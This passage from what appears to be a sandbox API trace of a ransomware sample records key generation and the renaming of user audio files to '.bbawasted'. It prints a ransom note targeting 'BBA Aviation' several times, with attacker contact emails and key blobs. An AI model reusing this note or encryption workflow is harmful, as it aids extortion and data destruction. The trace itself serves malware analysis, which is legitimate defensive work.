0x689df0 [0219.530] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0219.531] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0219.531] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0219.531] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ce0) returned 1 [0219.531] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0219.531] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0219.540] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0219.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0219.540] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.540] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NQfVJO6rBdEPI/2t0WGaRQxsnYx0yS2GQh+p9fXLoEtaX0gWGmfWX+2+1vyjvfiS\r\n1RRraybzGfwu2avAtwgFm/ptptKvUtTNy07PkZ4XxL7lOyYuGWZZDekx1u/qmnlS\r\nbF3vnB3/S8oS/0jB4ceewXIwL/LEyoS2dQsmKRAQGO5hFBhM33SDaMPvdY4Oz0Ov\r\nXk80TwhBdtDsg05PhYOUii6ICnHlstCLGCaCwBBWL2dwgvwS92bZwLupCpZLDYGv\r\nhoUIi0UZvaF8DLHTG71vRIz3OcsAN8jplWQu8SDuhItWpswHyTSZ5WcQzQnRJ1Zl\r\n7ITIf27BSbOsfd0+qaC98L67KOSFxh9ykukTHlvQsce0VzEdW4vkx+jNvjw06Elz\r\nKqrOaYAnEOyaUzNF4IRMBDZ58TcwuhQtq7Cp11TX1hdSLVo6fQovL4Rj+85rUfmB\r\n9Szu9w1hwKSmLtBJhKea6phiI3ei6vfEhrud6kd3F2Y+1DlfugRK9wdKzhq4hRuB\r\nSvnjRkLYIxrtWqx3WZpe8iVRqj56QRPxlct/Q3ZzA4lu/Klzn/yjgFMYLYRtBdvi\r\nWQDuxVuwlcVNo62ZRPauKANQ330M9/WcAyYaYR4jlVVkl7g+c56G5iLP/23+flWS\r\nXnr6xxols9VFPPU0vr0Swhxl+BXDPg7Q/cJYjp2sb9C=[end_key]\r\nKEEP IT\r\n") returned 984 [0219.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0219.540] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0219.554] SetEndOfFile (hFile=0x280) returned 1 [0219.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.556] CloseHandle (hObject=0x280) returned 1 [0219.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0219.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4778 | out: hHeap=0x660000) returned 1 [0219.557] _aulldvrm () returned 0x0 [0219.557] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0219.558] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0219.558] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0219.558] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\0XgqbyToW6.m4a") returned 74 [0219.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x29e) returned 0x6c4b88 [0219.558] lstrcpyW (in: lpString1=0x6c4c1c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0219.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.558] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a65f8) returned 1 [0219.559] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0219.559] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0219.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\0XgqbyToW6.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\0xgqbytow6.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0219.560] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0219.562] SetEndOfFile (hFile=0x280) returned 1 [0219.562] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0219.562] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.562] lstrcpyW (in: lpString1=0x6c4c1c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0219.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\0XgqbyToW6.m4a" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\0xgqbytow6.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\0XgqbyToW6.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\0xgqbytow6.m4a.bbawasted")) returned 1 [0219.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\0XgqbyToW6.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\0xgqbytow6.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0219.564] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0219.564] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x9661 [0219.564] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9661) returned 0x5f0000 [0219.564] CloseHandle (hObject=0x294) returned 1 [0219.566] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0219.566] CloseHandle (hObject=0x28c) returned 1 [0219.566] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0219.567] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0219.567] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0219.567] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0219.567] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0219.568] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0219.568] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0219.974] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0219.974] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0219.974] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.974] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]iPdWBh7RwYbx4uCk3VkrhJCt8h71Xx9rZOBfparHRoWDn9IJ5TGZX2yCG6MMxbMJ\r\nDvtYRnWCYfVFNZD93Go+4gLV2D86xhLh3JG+6Wd+PlgtuxjEUd4p5ZQIO6ABfcR+\r\n99bmtywLfqGTWWNUn1H0SIouDOOjCM4eTFGSz71/1IkL2k44mdgOAOU1Rk5p3N19\r\n4rdSLDWmDUmtS0ZrEzIFVAjwSaEqwKAz9wc8fRgcUClcKP88mF4vuFQkM09nxYtK\r\nJF2odoSyDquVoWWAm9wUXa/YnKUFJr5qnZl0bebOBFXdMsf/v4zNqBWOtc8G3IJ4\r\nc3znRO6icjawG0rVTZapTeV+/mVm3oV/mPBLrffp+zUwXa8DIA6vyDWCeno6YHIk\r\ned0OZDk9dakmv97LU6tCujEzo0r51l5YXxu9LFdL2MtoF6KZeTAqCD/khOQ1J3O9\r\nd0SOsNxDYY0yQtkB5suKSz26N9E9Dj5kwkANSvH2sDYaq8RGS9DJqgdfwC2iI2nX\r\n2TnpR6cgExAj9jjRI0N5ri5mxUX69sDSFVVWsxGLGIzYsTRovs/0kttfkj5+pgIV\r\neWw6jpjP672VUBueTKIltyOum20aAXQyck39oaNNM1mjRglGpCHfGTFE/WWKLlRJ\r\nbEIKtxU7gqhjsJDRWkcfuHSiOU5HL7QkAjLXEiluZo5=[end_key]\r\nKEEP IT\r\n") returned 984 [0219.975] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0219.975] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0219.975] SetEndOfFile (hFile=0x280) returned 1 [0219.978] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.978] CloseHandle (hObject=0x280) returned 1 [0219.978] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0219.978] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0219.978] _aulldvrm () returned 0x0 [0219.978] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f10) returned 1 [0219.979] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0219.979] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0219.979] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\KYv5fyQ-uOVDHPtLhn.mp3") returned 82 [0219.979] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ae) returned 0x6c4b88 [0219.980] lstrcpyW (in: lpString1=0x6c4c2c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0219.980] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0219.980] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0219.980] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0219.980] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0219.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\KYv5fyQ-uOVDHPtLhn.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\kyv5fyq-uovdhptlhn.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0219.993] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0219.995] SetEndOfFile (hFile=0x280) returned 1 [0219.995] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0219.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0219.995] lstrcpyW (in: lpString1=0x6c4c2c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0219.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\KYv5fyQ-uOVDHPtLhn.mp3" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\kyv5fyq-uovdhptlhn.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\KYv5fyQ-uOVDHPtLhn.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\kyv5fyq-uovdhptlhn.mp3.bbawasted")) returned 1 [0219.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\KYv5fyQ-uOVDHPtLhn.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\kyv5fyq-uovdhptlhn.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0219.996] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0219.997] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x118f3 [0219.997] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x118f3) returned 0x5f0000 [0219.997] CloseHandle (hObject=0x294) returned 1 [0220.001] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0220.002] CloseHandle (hObject=0x27c) returned 1 [0220.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0220.002] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6818) returned 1 [0220.003] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0220.003] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0220.003] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a61b8) returned 1 [0220.003] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0220.003] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0220.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0220.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0220.219] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.219] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]TUBRZHv4s9jghigQJajb/3ATTuLg18SaEl+GO4Dphdv2AcIUxbSONHQWCn/zpDCr\r\nUDtPyEUVRIrJouO35YB/8HuZAZmMd3a5WD84/Aq+Ej6Z7NEO6cegQN3ySShrQM0z\r\nJMEkoMCnQOg/DXMuRtbZ64jNgTz7lh9hJNv2IO69B29jjG2M9q11mE+1w7CxnO97\r\nlOyE1c8sAS/oIfph7FibofT1zrRUQW5adzePLCdtn+9h6Xusyif3ieFURBNi4iKy\r\nvWMdNYaHzoRP73N3OZ7ZSpD170mzDuLDJ/+/WhFqagjT/YnL14WZD3lJo0AIvi2d\r\n4U2QLdQ0haaPeMdV1dJLn3N1NMFFH2nWOQv1ZBaFP7bVPfFKEEzBgiP1WhnSD8yD\r\nQ+12KUY92+ZfHTJ71V8xy3cqL8MjExD9lTuVPicx8Pu9A/ZrPsiZCOrWsKPHlUaq\r\nVhgbvjeGhGgJDh8sEQrjzZZUgFO4KIFqkfwzBvyOpoSPmzo22zZmGSutlLAS12/H\r\nEn4HvH/0UNz0WPluyYromt4RE34q2HcxLIT7Lzm7NDiavNcO/F9pZQtSgoK2Wf4f\r\nXOstmJGIlckWVTldG/Uluk0UTegcZ2w8sWDD6PfhVodz6wYhn4hN/bOaeopjR+9r\r\njwtTFQ4haL04oGvLKbDFV13Wp3hpnAs+x5Fc/HeSg22=[end_key]\r\nKEEP IT\r\n") returned 984 [0220.219] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0220.219] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0220.220] SetEndOfFile (hFile=0x280) returned 1 [0220.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.223] CloseHandle (hObject=0x280) returned 1 [0220.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0220.223] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8c10 | out: hHeap=0x660000) returned 1 [0220.223] _aulldvrm () returned 0x0 [0220.223] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0220.224] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0220.224] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0220.224] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\s0MQ1eb1g4o.mp3") returned 75 [0220.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a0) returned 0x6b8a28 [0220.224] lstrcpyW (in: lpString1=0x6b8abe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0220.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.225] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0220.225] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0220.225] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0220.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\s0MQ1eb1g4o.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\s0mq1eb1g4o.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0220.226] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0220.228] SetEndOfFile (hFile=0x280) returned 1 [0220.228] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.228] lstrcpyW (in: lpString1=0x6b8abe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0220.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\s0MQ1eb1g4o.mp3" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\s0mq1eb1g4o.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\s0MQ1eb1g4o.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\s0mq1eb1g4o.mp3.bbawasted")) returned 1 [0220.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\s0MQ1eb1g4o.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\s0mq1eb1g4o.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0220.229] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0220.229] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xc178 [0220.230] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc178) returned 0x5f0000 [0220.230] CloseHandle (hObject=0x290) returned 1 [0220.232] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0220.233] CloseHandle (hObject=0x27c) returned 1 [0220.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0220.233] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a69b0) returned 1 [0220.234] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0220.234] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0220.234] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f10) returned 1 [0220.235] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0220.235] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0220.246] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0220.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0220.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.247] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, 